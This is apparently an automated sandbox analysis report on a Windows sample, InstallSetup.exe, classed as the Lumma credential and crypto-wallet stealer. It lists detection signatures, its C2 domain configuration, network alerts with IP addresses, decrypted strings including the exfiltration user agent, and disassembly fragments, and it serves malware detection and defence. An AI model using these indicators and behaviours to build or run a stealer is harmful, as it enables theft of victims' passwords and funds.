Edit tour

Windows Analysis Report
InstallSetup.exe

Overview

General Information

Sample name:	InstallSetup.exe
Analysis ID:	1577460
MD5:	8d746459e4ecdc159bd431bbc01e9672
SHA1:	7efd87f9513cd69ef9c43fe826895da73a5d679a
SHA256:	7d25ec756bbb5bec2e48dd71255de460789057b354de9dfcf6fce4ee2563d3da
Tags:	bulletproofexeLummaStealeruser-abus3reports
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

InstallSetup.exe (PID: 6664 cmdline: "C:\Users\user\Desktop\InstallSetup.exe" MD5: 8D746459E4ECDC159BD431BBC01E9672)

C7B4.tmp.exe (PID: 3032 cmdline: "C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe" MD5: 9026F04B1266851659FB62C91BD7F2F3)

WerFault.exe (PID: 5872 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 1952 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["energyaffai.lat", "aspecteirs.lat", "rapeflowwj.lat", "grannyejh.lat", "crosshuaht.lat", "discokeyus.lat", "sustainskelet.lat", "necklacebudi.lat"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000003.00000002.1818342942.0000000000A50000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1700:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.3922162162.0000000000C00000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1688:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: C7B4.tmp.exe PID: 3032	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: C7B4.tmp.exe PID: 3032	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: C7B4.tmp.exe PID: 3032	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 3 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:49:33.272870+0100	2028371	3	Unknown Traffic	192.168.2.8	49706	172.67.220.223	443	TCP
2024-12-18T13:49:35.220835+0100	2028371	3	Unknown Traffic	192.168.2.8	49707	172.67.220.223	443	TCP
2024-12-18T13:49:38.123685+0100	2028371	3	Unknown Traffic	192.168.2.8	49708	172.67.220.223	443	TCP
2024-12-18T13:49:40.368864+0100	2028371	3	Unknown Traffic	192.168.2.8	49711	172.67.220.223	443	TCP
2024-12-18T13:49:42.726217+0100	2028371	3	Unknown Traffic	192.168.2.8	49714	172.67.220.223	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:49:33.991819+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49706	172.67.220.223	443	TCP
2024-12-18T13:49:36.045088+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49707	172.67.220.223	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:49:33.991819+0100	2049836	1	A Network Trojan was detected	192.168.2.8	49706	172.67.220.223	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:49:36.045088+0100	2049812	1	A Network Trojan was detected	192.168.2.8	49707	172.67.220.223	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:49:33.272870+0100	2058375	1	Domain Observed Used for C2 Detected	192.168.2.8	49706	172.67.220.223	443	TCP
2024-12-18T13:49:35.220835+0100	2058375	1	Domain Observed Used for C2 Detected	192.168.2.8	49707	172.67.220.223	443	TCP
2024-12-18T13:49:38.123685+0100	2058375	1	Domain Observed Used for C2 Detected	192.168.2.8	49708	172.67.220.223	443	TCP
2024-12-18T13:49:40.368864+0100	2058375	1	Domain Observed Used for C2 Detected	192.168.2.8	49711	172.67.220.223	443	TCP
2024-12-18T13:49:42.726217+0100	2058375	1	Domain Observed Used for C2 Detected	192.168.2.8	49714	172.67.220.223	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:49:31.512750+0100	2058374	1	Domain Observed Used for C2 Detected	192.168.2.8	65277	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:49:41.130163+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.8	49711	172.67.220.223	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:49:26.142876+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49704	172.67.179.207	443	TCP
2024-12-18T13:49:27.727047+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49705	176.113.115.19	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: InstallSetup.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://rapeflowwj.lat/apij	Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEV	Avira URL Cloud: Label: malware
Source: https://rapeflowwj.lat/api	Avira URL Cloud: Label: malware
Source: https://rapeflowwj.lat/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1312567
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Avira: detection malicious, Label: HEUR/AGEN.1312567

Found malware configuration

Source: 3.3.C7B4.tmp.exe.9c0000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "aspecteirs.lat", "rapeflowwj.lat", "grannyejh.lat", "crosshuaht.lat", "discokeyus.lat", "sustainskelet.lat", "necklacebudi.lat"], "Build id": "4h5VfH--"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	ReversingLabs: Detection: 68%

Multi AV Scanner detection for submitted file

Source: InstallSetup.exe

ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: InstallSetup.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: rapeflowwj.lat
Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: crosshuaht.lat
Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: sustainskelet.lat
Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: aspecteirs.lat
Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: energyaffai.lat
Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: necklacebudi.lat
Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: discokeyus.lat
Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: grannyejh.lat
Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: rapeflowwj.lat
Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: - Screen Resoluton:
Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: Workgroup: -
Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: 4h5VfH--

Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe

Code function: 3_2_00415799 CryptUnprotectData,

3_2_00415799

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\InstallSetup.exe	Unpacked PE file: 0.2.InstallSetup.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Unpacked PE file: 3.2.C7B4.tmp.exe.400000.0.unpack

Source: InstallSetup.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\InstallSetup.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.8:49714 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe

Directory queried: number of queries: 1001

Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_004389F2 FindFirstFileExW,		0_2_004389F2
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00978C59 FindFirstFileExW,		0_2_00978C59

Source: C:\Users\user\Desktop\InstallSetup.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\track_prt[1].htm	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ebx, esi	3_2_00422190
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [ebx], cx	3_2_00422190
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	3_2_00422190
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ecx, eax	3_2_00409580
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	3_2_00409580
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]	3_2_0043C767
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov esi, eax	3_2_00415799
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ecx, eax	3_2_00415799
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then jmp eax	3_2_0042984F
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]	3_2_00423860
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov edx, ecx	3_2_00438810
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh	3_2_00438810
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh	3_2_00438810
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then test eax, eax	3_2_00438810
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0041682D
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]	3_2_0041682D
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]	3_2_0041682D
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [ecx], bp	3_2_0041D83A
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then push C0BFD6CCh	3_2_00423086
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then push C0BFD6CCh	3_2_00423086
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	3_2_0042B170
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000080h]	3_2_004179C1
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h	3_2_0043B1D0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ebx, eax	3_2_0043B1D0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [ecx], dx	3_2_004291DD
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	3_2_004291DD
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ebx, eax	3_2_00405990
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ebp, eax	3_2_00405990
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_0042CA49
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_0042DA53
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]	3_2_00416263
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]	3_2_00415220
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then push esi	3_2_00427AD3
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_0042CAD0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [ebx], ax	3_2_0041B2E0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then push ebx	3_2_0043CA93
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0041CB40
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [esi], cx	3_2_0041CB40
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00428B61
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_0042CB11
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_0042CB22
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	3_2_0043F330
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ebx, eax	3_2_0040DBD9
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ebx, eax	3_2_0040DBD9
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	3_2_00417380
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h	3_2_0041D380
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then cmp al, 2Eh	3_2_00426B95
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_00435450
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	3_2_00417380
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then push 00000000h	3_2_00429C2B
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [ecx], dx	3_2_004291DD
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	3_2_004291DD
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	3_2_0043ECA0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h	3_2_004385E0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then jmp eax	3_2_004385E0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]	3_2_00417DEE
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then jmp dword ptr [0044450Ch]	3_2_00418591
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov eax, dword ptr [ebp-68h]	3_2_00428D93
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then xor edi, edi	3_2_0041759F
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov eax, dword ptr [0044473Ch]	3_2_0041C653
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov edx, ebp	3_2_00425E70
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then jmp dword ptr [004455F4h]	3_2_00425E30
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ecx, eax	3_2_0043AEC0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then xor byte ptr [esp+eax+17h], al	3_2_00408F50
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov byte ptr [edi], bl	3_2_00408F50
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_0042A700
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then lea edx, dword ptr [ecx+01h]	3_2_0040B70C
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_0041BF14
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h]	3_2_00419F30
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]	3_2_0041E7C0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx eax, word ptr [edx]	3_2_004197C2
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [edi], dx	3_2_004197C2
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [esi], cx	3_2_004197C2
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ecx, ebx	3_2_0042DFE9
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then jmp ecx	3_2_0040BFFD
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	3_2_0043EFB0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov eax, dword ptr [0044473Ch]	3_2_0098C8BA
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov edx, ebp	3_2_009960D7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]	3_2_00994031
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]	3_2_00988055
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h	3_2_009A887B
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h]	3_2_0098A197
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then jmp eax	3_2_009A898E
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then xor byte ptr [esp+eax+17h], al	3_2_009791B7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov byte ptr [edi], bl	3_2_009791B7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ecx, eax	3_2_009AB127
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_0098C17B
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then lea edx, dword ptr [ecx+01h]	3_2_0097B973
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_0099A967
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [ecx], bp	3_2_0098DAB8
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then jmp eax	3_2_00999AB5
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+6D2CC012h]	3_2_00984ACD
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then push C0BFD6CCh	3_2_009932ED
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	3_2_009AF217
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0098D230
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [esi], cx	3_2_0098D230
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx eax, word ptr [edx]	3_2_00989A29
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [edi], dx	3_2_00989A29
